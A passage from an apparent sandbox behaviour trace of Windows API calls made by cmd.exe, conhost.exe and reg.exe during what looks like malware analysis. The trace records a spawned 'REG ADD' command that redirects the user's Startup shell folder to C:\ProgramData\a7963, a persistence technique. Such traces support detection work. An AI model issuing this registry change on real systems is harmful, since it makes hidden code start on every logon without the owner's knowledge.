lpFindFileData=0x30feee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30feee8) returned 0xffffffff [0121.703] GetLastError () returned 0x2 [0121.703] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\reg.EXE", fInfoLevelId=0x1, lpFindFileData=0x30feee8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x30feee8) returned 0x3361680 [0121.703] GetProcessHeap () returned 0x3360000 [0121.703] RtlReAllocateHeap (Heap=0x3360000, Flags=0x0, Ptr=0x33616c0, Size=0x4) returned 0x33616c0 [0121.703] FindClose (in: hFindFile=0x3361680 | out: hFindFile=0x3361680) returned 1 [0121.703] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0121.703] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0121.703] ??_V@YAXPAX@Z () returned 0x1 [0121.703] GetConsoleTitleW (in: lpConsoleTitle=0x30ff3ec, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe") returned 0x1c [0121.751] InitializeProcThreadAttributeList (in: lpAttributeList=0x30ff318, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x30ff304 | out: lpAttributeList=0x30ff318, lpSize=0x30ff304) returned 1 [0121.751] UpdateProcThreadAttribute (in: lpAttributeList=0x30ff318, dwFlags=0x0, Attribute=0x60001, lpValue=0x30ff300, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x30ff318, lpPreviousValue=0x0) returned 1 [0121.751] GetStartupInfoW (in: lpStartupInfo=0x30ff350 | out: lpStartupInfo=0x30ff350*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\WINDOWS\\SYSTEM32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0121.752] GetProcessHeap () returned 0x3360000 [0121.752] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0x18) returned 0x33616d0 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0121.752] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0121.753] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0121.753] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0121.753] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0121.753] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0121.753] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0121.753] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0121.753] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0121.753] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0121.753] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0121.753] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0121.753] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0121.753] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0121.753] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0121.753] GetProcessHeap () returned 0x3360000 [0121.753] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x33616d0) returned 1 [0121.753] GetProcessHeap () returned 0x3360000 [0121.753] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xa) returned 0x33616d0 [0121.753] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0121.755] _get_osfhandle (_FileHandle=1) returned 0x90 [0121.755] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0121.769] _get_osfhandle (_FileHandle=0) returned 0x8c [0121.769] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1f7) returned 1 [0121.786] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\reg.exe", lpCommandLine="REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\a7963", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Documents", lpStartupInfo=0x30ff2a0*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\a7963", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x30ff2ec | out: lpCommandLine="REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\a7963", lpProcessInformation=0x30ff2ec*(hProcess=0xe0, hThread=0xdc, dwProcessId=0x11e8, dwThreadId=0x1388)) returned 1 [0121.973] CloseHandle (hObject=0xdc) returned 1 [0121.974] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0121.974] GetProcessHeap () returned 0x3360000 [0121.974] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3368cc8) returned 1 [0121.974] GetEnvironmentStringsW () returned 0x3368cc8* [0121.974] GetProcessHeap () returned 0x3360000 [0121.974] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xc66) returned 0x3364fc0 [0121.974] FreeEnvironmentStringsA (penv="=") returned 1 [0121.974] WaitForSingleObject (hHandle=0xe0, dwMilliseconds=0xffffffff) returned 0x0 [0122.729] GetExitCodeProcess (in: hProcess=0xe0, lpExitCode=0x30ff284 | out: lpExitCode=0x30ff284*=0x0) returned 1 [0122.732] CloseHandle (hObject=0xe0) returned 1 [0122.732] _vsnwprintf (in: _Buffer=0x30ff36c, _BufferCount=0x13, _Format="%08X", _ArgList=0x30ff28c | out: _Buffer="00000000") returned 8 [0122.733] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0122.733] GetProcessHeap () returned 0x3360000 [0122.733] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3364fc0) returned 1 [0122.734] GetEnvironmentStringsW () returned 0x3364fc0* [0122.734] GetProcessHeap () returned 0x3360000 [0122.734] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xc8c) returned 0x3367bb0 [0122.734] FreeEnvironmentStringsA (penv="=") returned 1 [0122.734] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0122.734] GetProcessHeap () returned 0x3360000 [0122.734] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x3367bb0) returned 1 [0122.734] GetEnvironmentStringsW () returned 0x3364fc0* [0122.734] GetProcessHeap () returned 0x3360000 [0122.734] RtlAllocateHeap (HeapHandle=0x3360000, Flags=0x8, Size=0xc8c) returned 0x3367bb0 [0122.734] FreeEnvironmentStringsA (penv="=") returned 1 [0122.734] GetProcessHeap () returned 0x3360000 [0122.734] RtlFreeHeap (HeapHandle=0x3360000, Flags=0x0, BaseAddress=0x33616d0) returned 1 [0122.734] DeleteProcThreadAttributeList (in: lpAttributeList=0x30ff318 | out: lpAttributeList=0x30ff318) [0122.734] ??_V@YAXPAX@Z () returned 0x1 [0122.734] _get_osfhandle (_FileHandle=1) returned 0x90 [0122.734] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x3) returned 1 [0122.827] _get_osfhandle (_FileHandle=1) returned 0x90 [0122.827] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0x993890 | out: lpMode=0x993890) returned 1 [0122.834] _get_osfhandle (_FileHandle=1) returned 0x90 [0122.835] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0122.839] _get_osfhandle (_FileHandle=0) returned 0x8c [0122.839] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0x993894 | out: lpMode=0x993894) returned 1 [0122.846] _get_osfhandle (_FileHandle=0) returned 0x8c [0122.846] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0122.853] SetConsoleInputExeNameW () returned 0x1 [0122.853] GetConsoleOutputCP () returned 0x1b5 [0122.902] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x993850 | out: lpCPInfo=0x993850) returned 1 [0122.902] SetThreadUILanguage (LangId=0x0) returned 0x2f60409 [0122.923] exit (_Code=0) [0122.923] ??_V@YAXPAX@Z () returned 0x1 Thread: id = 73 os_tid = 0x1148 Process: id = "5" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x7a488000" os_pid = "0xf88" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x308" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000110fb" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 68 os_tid = 0xc60 Thread: id = 69 os_tid = 0x1004 Thread: id = 70 os_tid = 0xdbc Thread: id = 71 os_tid = 0x7b0 Thread: id = 72 os_tid = 0xfec Process: id = "6" image_name = "reg.exe" filename = "c:\\windows\\syswow64\\reg.exe" page_root = "0xc255000" os_pid = "0x11e8" os_integrity_level = "0x2000" os_privileges = "0x40800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x308" cmd_line = "REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\a7963" cur_dir = "C:\\Users\\FD1HVy\\Documents\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000110fb" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 74 os_tid = 0x1388 [0122.622] GetModuleHandleA (lpModuleName=0x0) returned 0xec0000 [0122.622] __set_app_type (_Type=0x1) [0122.623] __p__fmode () returned 0x75873c14 [0122.623] __p__commode () returned 0x758749ec [0122.623] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xecc780) returned 0x0 [0122.623] __wgetmainargs (in: _Argc=0xecd028, _Argv=0xecd02c, _Env=0xecd030, _DoWildCard=0, _StartInfo=0xecd03c | out: _Argc=0xecd028, _Argv=0xecd02c, _Env=0xecd030) returned 0 [0122.623] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="QUERY", cchCount2=-1) returned 1 [0122.624] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0122.625] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", phkResult=0x83fe8c | out: phkResult=0x83fe8c*=0x0) returned 0x2 [0122.625] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="ADD", cchCount1=-1, lpString2="ADD", cchCount2=-1) returned 2 [0122.625] lstrlenW (lpString="-?|/?|-h|/h") returned 11 [0122.625] GetProcessHeap () returned 0xbc0000 [0122.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x10) returned 0xbc7e48 [0122.625] lstrlenW (lpString="") returned 0 [0122.625] GetProcessHeap () returned 0xbc0000 [0122.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x2) returned 0xbc4938 [0122.625] GetProcessHeap () returned 0xbc0000 [0122.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x14) returned 0xbc4670 [0122.625] GetProcessHeap () returned 0xbc0000 [0122.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x10) returned 0xbc7e60 [0122.625] GetProcessHeap () returned 0xbc0000 [0122.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x14) returned 0xbc4430 [0122.625] GetProcessHeap () returned 0xbc0000 [0122.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x14) returned 0xbc4b50 [0122.625] GetProcessHeap () returned 0xbc0000 [0122.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x14) returned 0xbc4b70 [0122.625] GetProcessHeap () returned 0xbc0000 [0122.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x14) returned 0xbc4b90 [0122.625] GetProcessHeap () returned 0xbc0000 [0122.625] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x10) returned 0xbc7e78 [0122.626] GetProcessHeap () returned 0xbc0000 [0122.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x14) returned 0xbc4010 [0122.626] GetProcessHeap () returned 0xbc0000 [0122.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x14) returned 0xbc4030 [0122.626] GetProcessHeap () returned 0xbc0000 [0122.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x14) returned 0xbc4050 [0122.626] GetProcessHeap () returned 0xbc0000 [0122.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x14) returned 0xbc46f0 [0122.626] GetProcessHeap () returned 0xbc0000 [0122.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x10) returned 0xbc7d88 [0122.626] GetProcessHeap () returned 0xbc0000 [0122.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x14) returned 0xbc4710 [0122.626] GetProcessHeap () returned 0xbc0000 [0122.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x14) returned 0xbc4730 [0122.626] GetProcessHeap () returned 0xbc0000 [0122.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x14) returned 0xbc4bd0 [0122.626] GetProcessHeap () returned 0xbc0000 [0122.626] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x14) returned 0xbc4bf0 [0122.626] SetThreadUILanguage (LangId=0x0) returned 0x750409 [0122.652] GetProcessHeap () returned 0xbc0000 [0122.652] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x10) returned 0xbc7da0 [0122.652] _memicmp (_Buf1=0xbc7da0, _Buf2=0xec1b8c, _Size=0x7) returned 0 [0122.652] GetProcessHeap () returned 0xbc0000 [0122.652] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x1e) returned 0xbc4118 [0122.653] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 74 [0122.653] GetProcessHeap () returned 0xbc0000 [0122.653] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x10) returned 0xbc7e18 [0122.653] _memicmp (_Buf1=0xbc7e18, _Buf2=0xec1b8c, _Size=0x7) returned 0 [0122.653] GetProcessHeap () returned 0xbc0000 [0122.653] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x9c) returned 0xbc44b0 [0122.653] _vsnwprintf (in: _Buffer=0xbc4118, _BufferCount=0xe, _Format="|%s|", _ArgList=0x83fda0 | out: _Buffer="|-?|/?|-h|/h|") returned 13 [0122.654] _vsnwprintf (in: _Buffer=0xbc44b0, _BufferCount=0x4d, _Format="|%s|", _ArgList=0x83fda0 | out: _Buffer="|HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders|") returned 76 [0122.654] lstrlenW (lpString="|-?|/?|-h|/h|") returned 13 [0122.654] lstrlenW (lpString="|HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders|") returned 76 [0122.654] RtlRestoreLastWin32Error () returned 0x75f000 [0122.654] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 74 [0122.654] GetProcessHeap () returned 0xbc0000 [0122.654] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x96) returned 0xbc94f0 [0122.654] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 74 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x48) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x4b) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x61) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x4d) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x63) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x66) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0122.654] StrChrW (lpStart=" \x09", wMatch=0x57) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x77) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x43) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x75) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x74) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x56) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x69) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x6e) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x45) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x78) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x70) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x5c) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x55) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0122.655] StrChrW (lpStart=" \x09", wMatch=0x53) returned 0x0 [0122.655] StrChrW (lpStart=" \x09", wMatch=0x68) returned 0x0 [0122.656] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0122.656] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0122.656] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0122.656] StrChrW (lpStart=" \x09", wMatch=0x20) returned=" \x09" [0122.656] StrChrW (lpStart=" \x09", wMatch=0x46) returned 0x0 [0122.656] StrChrW (lpStart=" \x09", wMatch=0x6f) returned 0x0 [0122.656] StrChrW (lpStart=" \x09", wMatch=0x6c) returned 0x0 [0122.656] StrChrW (lpStart=" \x09", wMatch=0x64) returned 0x0 [0122.656] StrChrW (lpStart=" \x09", wMatch=0x65) returned 0x0 [0122.656] StrChrW (lpStart=" \x09", wMatch=0x72) returned 0x0 [0122.656] StrChrW (lpStart=" \x09", wMatch=0x73) returned 0x0 [0122.656] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 74 [0122.656] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", cchCount1=2, lpString2="\\\\", cchCount2=2) returned 3 [0122.656] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 74 [0122.656] lstrlenW (lpString="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 74 [0122.656] StrChrIW (lpStart="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", wMatch=0x5c) returned="\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" [0122.656] lstrlenW (lpString="HKEY_CURRENT_CONFIG") returned 19 [0122.656] GetProcessHeap () returned 0xbc0000 [0122.656] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0xc, Size=0x28) returned 0xbc3e60 [0122.656] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="HKCU", cchCount1=-1, lpString2="HKCU", cchCount2=-1) returned 2 [0122.657] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0122.657] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0122.657] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0122.657] StrChrIW (lpStart="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", wMatch=0x5c) returned="\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" [0122.657] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0122.657] StrChrIW (lpStart="Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", wMatch=0x5c) returned="\\Windows\\CurrentVersion\\Explorer\\User Shell Folders" [0122.657] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0122.657] StrChrIW (lpStart="Windows\\CurrentVersion\\Explorer\\User Shell Folders", wMatch=0x5c) returned="\\CurrentVersion\\Explorer\\User Shell Folders" [0122.657] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0122.657] StrChrIW (lpStart="CurrentVersion\\Explorer\\User Shell Folders", wMatch=0x5c) returned="\\Explorer\\User Shell Folders" [0122.657] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0122.657] StrChrIW (lpStart="Explorer\\User Shell Folders", wMatch=0x5c) 